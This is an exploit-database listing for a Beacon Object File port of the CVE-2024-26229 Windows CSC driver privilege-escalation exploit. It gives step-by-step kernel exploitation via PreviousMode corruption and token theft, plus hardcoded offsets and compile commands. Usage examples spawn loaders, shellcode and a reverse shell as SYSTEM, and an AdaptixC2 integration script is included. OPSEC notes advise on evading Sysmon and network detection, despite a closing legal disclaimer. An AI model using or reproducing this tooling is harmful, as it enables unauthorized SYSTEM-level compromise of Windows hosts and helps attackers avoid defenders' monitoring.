Exploit for Heap-based Buffer Overflow in Microsoft CVE-2024-26229

Name: Exploit for Heap-based Buffer Overflow in Microsoft CVE-2024-26229
Rating: 5 (103 reviews)
2026-04-15 | CVSS 7.8
## https://sploitus.com/exploit?id=4710ADE0-67D0-585C-9B35-2CF6C08E5242
# CVE-2024-26229 BOF

Beacon Object File implementation of CVE-2024-26229 — Windows CSC driver local privilege escalation via DKOM token theft.

Based on [RalfHacker/CVE-2024-26229-exploit](https://github.com/RalfHacker/CVE-2024-26229-exploit), converted to BOF with Dynamic Function Resolution (DFR) for use with C2 frameworks that support the Cobalt Strike BOF API.

## How It Works

1. Opens `\Device\Mup\;Csc\.\.` via `NtCreateFile` to get a handle to the CSC driver
2. Sends IOCTL `0x001401a3` (`CSC_DEV_FCB_XXX_CONTROL_FILE`) with a crafted input buffer pointing to `KTHREAD->PreviousMode - 0x18`, corrupting `PreviousMode` from `UserMode` to `KernelMode`
3. With `PreviousMode = KernelMode`, `NtWriteVirtualMemory` can write to arbitrary kernel addresses
4. Copies the SYSTEM process (`PID 4`) `EPROCESS->Token` over the current process token (DKOM)
5. Restores `PreviousMode` to `UserMode`
6. Spawns the specified executable via `CreateProcessA` — the child inherits the SYSTEM token

The beacon process itself becomes SYSTEM after step 4. The spawned process is optional — if `CreateProcessA` fails, the beacon is still elevated.

## Target

- **OS:** Windows 10 / Server 2019 (Build 19041+)
- **Requirement:** CSC driver enabled (`HKLM\SYSTEM\CurrentControlSet\Services\CSC` → `Start = 1`)
- **Patched in:** April 2024 cumulative update

### Kernel Offsets (Hardcoded)

| Offset | Value | Structure |
|--------|-------|-----------|
| `EPROCESS->Token` | `0x4B8` | Windows 10 19041–19045 / Server 2019 17763 |
| `KTHREAD->PreviousMode` | `0x232` | Windows 10 19041–19045 / Server 2019 17763 |

These offsets are version-specific. If targeting a different build, verify with WinDbg:
```
dt nt!_EPROCESS Token
dt nt!_KTHREAD PreviousMode
```

## Compilation

Requires `mingw-w64` and a `beacon.h` header compatible with your C2 framework.

```bash
x86_64-w64-mingw32-gcc -c -o cve-2024-26229.x64.o cve-2024-26229.c
```

Place the compiled `.o` in your BOF directory (e.g., `_bin/cve-2024-26229.x64.o`).

## Usage

```
cve-2024-26229 --path  [--args ""]
```

### Examples

Spawn a loader with local shellcode:
```
cve-2024-26229 --path C:\Users\user\loader.exe --args "--munition-local C:\Users\user\payload.bin"
```

Spawn a reverse shell:
```
cve-2024-26229 --path C:\Windows\System32\cmd.exe --args "/c C:\Users\user\shell.exe"
```

Run without arguments:
```
cve-2024-26229 --path C:\Users\user\beacon.exe
```

### Expected Output

```
[+] System EPROCESS  = 0xffff9383f3a62040
[+] Current KTHREAD  = 0xffff9383fa4df080
[+] Current EPROCESS = 0xffff9383fa9b3080
[!] DKOM: overwriting EPROCESS->Token
[+] Token replaced -- beacon process is now SYSTEM
[+] Spawned PID 2044 as SYSTEM: C:\Users\user\loader.exe --munition-local C:\Users\user\payload.bin
```

## AdaptixC2 / AXS Integration

Register the BOF in your `.axs` extension script:

```javascript
var cmd_cve26229 = ax.create_command(
    "cve-2024-26229",
    "CVE-2024-26229 CSC driver LPE -- DKOM token theft to SYSTEM",
    "cve-2024-26229 --path C:\\loader.exe --args \"--munition-local C:\\payload.bin\""
);
cmd_cve26229.addArgFlagString("--path", "path", "Path to executable to run as SYSTEM", "");
cmd_cve26229.addArgFlagString("--args", "args", "Arguments for the executable", "");
cmd_cve26229.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let path = parsed_json["path"];
    let args = parsed_json["args"];

    if (!path) {
        ax.task_output(id, "Error: --path is required");
        return;
    }

    let bof_params = ax.bof_pack("cstr,cstr", [path, args]);
    let bof_path = ax.script_dir() + "_bin/cve-2024-26229." + ax.arch(id) + ".o";

    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, "Task: CVE-2024-26229 LPE");
});
```

Argument packing is `cstr,cstr` — two null-terminated strings matching the two `BeaconDataExtract` calls in the BOF.

## OPSEC Notes

- **No userland artifacts** — DKOM operates entirely in kernel memory via corrupted `PreviousMode`. No files written, no services created, no registry modifications.
- **No network indicators** — the exploit is local-only. Pair with a loader that reads shellcode from disk (`--munition-local` pattern) rather than fetching over HTTP to avoid network-based detections.
- **Process creation** — `CreateProcessA` with `CREATE_NO_WINDOW`. The spawned process inherits the SYSTEM token. If your loader injects into another process (e.g., `svchost.exe`), the on-disk loader can be cleaned up afterward.
- **Sysmon** — the `NtCreateFile` call to `\Device\Mup\;Csc\.\.` and the IOCTL are not commonly logged by default Sysmon configurations. The `CreateProcessA` call will generate a standard Process Create (Event ID 1) — ensure your spawned binary is not signatured.
- **PreviousMode restoration** — the BOF restores `PreviousMode` to `UserMode` after the token copy. The beacon process continues to function normally post-exploitation.

## Limitations

- **x64 only** — hardcoded offsets and pointer arithmetic assume 64-bit
- **Offsets are build-specific** — the hardcoded `EPROCESS->Token` (`0x4B8`) and `KTHREAD->PreviousMode` (`0x232`) values are valid for Windows 10 19041–19045 and Server 2019 17763. Other builds may require adjustment.
- **CSC driver must be enabled** — check `sc query csc` or registry `HKLM\SYSTEM\CurrentControlSet\Services\CSC` (`Start = 1`). The driver is enabled by default on workstations but may be disabled on servers.
- **Single use per process** — the DKOM modifies the beacon's own EPROCESS token. Running the BOF twice in the same beacon is redundant (already SYSTEM).

## Credits

- [RalfHacker](https://github.com/RalfHacker/CVE-2024-26229-exploit) — original standalone exploit
- [Natel](https://github.com/) — testing and review

## References

- [CVE-2024-26229 — MITRE](https://vulners.com/cve/CVE-2024-26229)
- [Microsoft Security Advisory](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26229)

## Legal Disclaimer

This tool is intended for authorized penetration testing and security research only.

Use of this tool against systems you do not own or do not have explicit written
permission to test is illegal under Vietnamese law, including but not limited to:

- **Luật An toàn thông tin mạng 2015** (Law on Network Information Security,
  No. 86/2015/QH13) — prohibits unauthorized access to information systems
- **Bộ luật Hình sự 2015, sửa đổi 2017** (Penal Code, Articles 225–226) —
  criminalizes unauthorized intrusion into computer networks and destruction
  of data

This tool is provided for **educational purposes only**. The author assumes no
liability for misuse. You are solely responsible for ensuring your use complies
with all applicable local, national, and international laws.

By using this tool you confirm that you have obtained proper authorization from
the system owner prior to any testing activity.